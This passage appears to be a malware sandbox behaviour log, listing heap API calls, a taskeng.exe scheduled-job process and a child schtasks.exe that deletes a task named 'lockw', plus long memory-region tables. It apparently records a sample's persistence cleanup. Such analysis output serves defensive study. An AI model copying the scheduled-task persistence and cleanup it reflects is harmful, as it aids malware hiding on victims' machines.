[0222.940] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ba0) returned 1
[0222.940] GetProcessHeap () returned 0x2d0000
[0222.940] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5ba0) returned 0x20
[0222.941] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ba0 | out: hHeap=0x2d0000) returned 1
[0222.941] GetProcessHeap () returned 0x2d0000
[0222.941] GetProcessHeap () returned 0x2d0000
[0222.941] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5bd0) returned 1
[0222.941] GetProcessHeap () returned 0x2d0000
[0222.941] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5bd0) returned 0x20
[0222.941] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5bd0 | out: hHeap=0x2d0000) returned 1
[0222.941] GetProcessHeap () returned 0x2d0000
[0222.941] GetProcessHeap () returned 0x2d0000
[0222.941] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c00) returned 1
[0222.941] GetProcessHeap () returned 0x2d0000
[0222.941] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5c00) returned 0x20
[0222.942] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c00 | out: hHeap=0x2d0000) returned 1
[0222.942] GetProcessHeap () returned 0x2d0000
[0222.942] GetProcessHeap () returned 0x2d0000
[0222.942] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebba0) returned 1
[0222.942] GetProcessHeap () returned 0x2d0000
[0222.942] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebba0) returned 0x18
[0222.942] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebba0 | out: hHeap=0x2d0000) returned 1
[0222.942] GetProcessHeap () returned 0x2d0000
[0222.942] GetProcessHeap () returned 0x2d0000
[0222.942] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c30) returned 1
[0222.942] GetProcessHeap () returned 0x2d0000
[0222.943] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5c30) returned 0x20
[0222.943] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c30 | out: hHeap=0x2d0000) returned 1
[0222.943] GetProcessHeap () returned 0x2d0000
[0222.943] GetProcessHeap () returned 0x2d0000
[0222.943] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5cc0) returned 1
[0222.943] GetProcessHeap () returned 0x2d0000
[0222.943] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5cc0) returned 0x20
[0222.944] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5cc0 | out: hHeap=0x2d0000) returned 1
[0222.944] GetProcessHeap () returned 0x2d0000
[0222.944] GetProcessHeap () returned 0x2d0000
[0222.944] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5d20) returned 1
[0222.944] GetProcessHeap () returned 0x2d0000
[0222.944] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5d20) returned 0x20
[0222.944] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5d20 | out: hHeap=0x2d0000) returned 1
[0222.944] GetProcessHeap () returned 0x2d0000
[0222.944] GetProcessHeap () returned 0x2d0000
[0222.944] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5d80) returned 1
[0222.944] GetProcessHeap () returned 0x2d0000
[0222.945] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5d80) returned 0x20
[0222.945] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5d80 | out: hHeap=0x2d0000) returned 1
[0222.945] GetProcessHeap () returned 0x2d0000
[0222.945] GetProcessHeap () returned 0x2d0000
[0222.945] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5db0) returned 1
[0222.945] GetProcessHeap () returned 0x2d0000
[0222.945] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5db0) returned 0x20
[0222.946] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5db0 | out: hHeap=0x2d0000) returned 1
[0222.946] GetProcessHeap () returned 0x2d0000
[0222.946] GetProcessHeap () returned 0x2d0000
[0222.946] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecc90) returned 1
[0222.946] GetProcessHeap () returned 0x2d0000
[0222.946] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ecc90) returned 0x20
[0222.946] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecc90 | out: hHeap=0x2d0000) returned 1
[0222.946] GetProcessHeap () returned 0x2d0000
[0222.946] GetProcessHeap () returned 0x2d0000
[0222.946] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebbc0) returned 1
[0222.947] GetProcessHeap () returned 0x2d0000
[0222.947] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebbc0) returned 0x18
[0222.947] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebbc0 | out: hHeap=0x2d0000) returned 1
[0222.947] GetProcessHeap () returned 0x2d0000
[0222.947] GetProcessHeap () returned 0x2d0000
[0222.947] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5cf0) returned 1
[0222.947] GetProcessHeap () returned 0x2d0000
[0222.947] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5cf0) returned 0x20
[0222.947] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5cf0 | out: hHeap=0x2d0000) returned 1
[0223.068] GetProcessHeap () returned 0x2d0000
[0223.068] GetProcessHeap () returned 0x2d0000
[0223.068] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb40) returned 1
[0223.068] GetProcessHeap () returned 0x2d0000
[0223.068] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebb40) returned 0x18
[0223.068] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb40 | out: hHeap=0x2d0000) returned 1
[0223.069] exit (_Code=0)
Thread:
id = 40
os_tid = 0xd48
Process:
id = "3"
image_name = "taskeng.exe"
filename = "c:\\windows\\system32\\taskeng.exe"
page_root = "0x75343000"
os_pid = "0x384"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "created_scheduled_job"
parent_id = "2"
os_parent_pid = "0x36c"
cmd_line = "taskeng.exe {33C6C6ED-05D5-479F-9912-01F9AEE1F38B} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\\kEecfMwgj:Interactive:LUA[1]"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1131
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1132
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1133
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1134
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1135
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1136
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1137
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1138
start_va = 0xff640000
end_va = 0xff6b3fff
monitored = 0
entry_point = 0xff64f44c
region_type = mapped_file
name = "taskeng.exe"
filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe")
Region:
id = 1139
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1140
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1141
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1142
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1143
start_va = 0xd0000
end_va = 0x2bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1144
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1145
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1146
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1147
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1148
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1149
start_va = 0xd0000
end_va = 0x136fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1150
start_va = 0x1c0000
end_va = 0x2bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1151
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1152
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1153
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1154
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1155
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1156
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1157
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1158
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1159
start_va = 0x7fefaa30000
end_va = 0x7fefaa39fff
monitored = 0
entry_point = 0x7fefaa3260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 1160
start_va = 0x7fefd2f0000
end_va = 0x7fefd35cfff
monitored = 0
entry_point = 0x7fefd2f1010
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1161
start_va = 0x140000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 1162
start_va = 0x2c0000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 1163
start_va = 0x140000
end_va = 0x168fff
monitored = 0
entry_point = 0x141010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1164
start_va = 0x1b0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 1165
start_va = 0x3c0000
end_va = 0x547fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 1166
start_va = 0x140000
end_va = 0x168fff
monitored = 0
entry_point = 0x141010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1167
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1168
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1169
start_va = 0x550000
end_va = 0x6d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 1170
start_va = 0x6e0000
end_va = 0x1adffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006e0000"
filename = ""
Region:
id = 1171
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskeng.exe.mui"
filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui")
Region:
id = 1172
start_va = 0x140000
end_va = 0x140fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 1173
start_va = 0x150000
end_va = 0x150fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 1174
start_va = 0x1ae0000
end_va = 0x1cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ae0000"
filename = ""
Region:
id = 1175
start_va = 0x1ae0000
end_va = 0x1b5cfff
monitored = 0
entry_point = 0x1aecec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1176
start_va = 0x1c40000
end_va = 0x1cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c40000"
filename = ""
Region:
id = 1177
start_va = 0x1ae0000
end_va = 0x1b5cfff
monitored = 0
entry_point = 0x1aecec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1178
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1179
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1180
start_va = 0x1ba0000
end_va = 0x1c1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ba0000"
filename = ""
Region:
id = 1181
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 1182
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1183
start_va = 0x7fefd0c0000
end_va = 0x7fefd0d7fff
monitored = 0
entry_point = 0x7fefd0c3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1184
start_va = 0x160000
end_va = 0x1a4fff
monitored = 0
entry_point = 0x161064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1185
start_va = 0x160000
end_va = 0x1a4fff
monitored = 0
entry_point = 0x161064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1186
start_va = 0x160000
end_va = 0x1a4fff
monitored = 0
entry_point = 0x161064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1187
start_va = 0x160000
end_va = 0x1a4fff
monitored = 0
entry_point = 0x161064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1188
start_va = 0x160000
end_va = 0x1a4fff
monitored = 0
entry_point = 0x161064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1189
start_va = 0x7fefcdc0000
end_va = 0x7fefce06fff
monitored = 0
entry_point = 0x7fefcdc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1190
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1191
start_va = 0x1e30000
end_va = 0x1eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e30000"
filename = ""
Region:
id = 1192
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 1193
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1194
start_va = 0x1cc0000
end_va = 0x1dbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cc0000"
filename = ""
Region:
id = 1195
start_va = 0x1ec0000
end_va = 0x1f3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ec0000"
filename = ""
Region:
id = 1196
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 1197
start_va = 0x1f40000
end_va = 0x220efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1198
start_va = 0x7fefd7b0000
end_va = 0x7fefd7c3fff
monitored = 0
entry_point = 0x7fefd7b10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1199
start_va = 0x1b20000
end_va = 0x1b9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b20000"
filename = ""
Region:
id = 1200
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 1201
start_va = 0x2310000
end_va = 0x238ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002310000"
filename = ""
Region:
id = 1202
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 1203
start_va = 0x160000
end_va = 0x160fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 1204
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1205
start_va = 0x7fefb280000
end_va = 0x7fefb288fff
monitored = 0
entry_point = 0x7fefb2811a0
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 1206
start_va = 0x7fefbcb0000
end_va = 0x7fefbce4fff
monitored = 0
entry_point = 0x7fefbcb1064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 1207
start_va = 0x23a0000
end_va = 0x241ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023a0000"
filename = ""
Region:
id = 1208
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1209
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 1210
start_va = 0x2420000
end_va = 0x268ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002420000"
filename = ""
Region:
id = 1211
start_va = 0x2210000
end_va = 0x22eefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002210000"
filename = ""
Region:
id = 1212
start_va = 0x7fefbcf0000
end_va = 0x7fefbd07fff
monitored = 0
entry_point = 0x7fefbcf1130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Thread:
id = 41
os_tid = 0x7f8
Thread:
id = 42
os_tid = 0x8a0
Thread:
id = 43
os_tid = 0xb94
Thread:
id = 44
os_tid = 0x244
Thread:
id = 45
os_tid = 0xba8
Thread:
id = 46
os_tid = 0xbb0
Thread:
id = 47
os_tid = 0x664
Thread:
id = 103
os_tid = 0xd10
Process:
id = "4"
image_name = "schtasks.exe"
filename = "c:\\windows\\system32\\schtasks.exe"
page_root = "0x110f000"
os_pid = "0x448"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "3"
os_parent_pid = "0x384"
cmd_line = "schtasks.exe /delete /tn \"\\lockw\" /f"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1488
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1489
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1490
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1491
start_va = 0x1d0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1492
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1493
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1494
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1495
start_va = 0xffe60000
end_va = 0xffea7fff
monitored = 1
entry_point = 0xffe8966c
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\System32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")
Region:
id = 1496
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1497
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1498
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 1499
start_va = 0x7fffffde000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 1500
start_va = 0x50000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1501
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1502
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1503
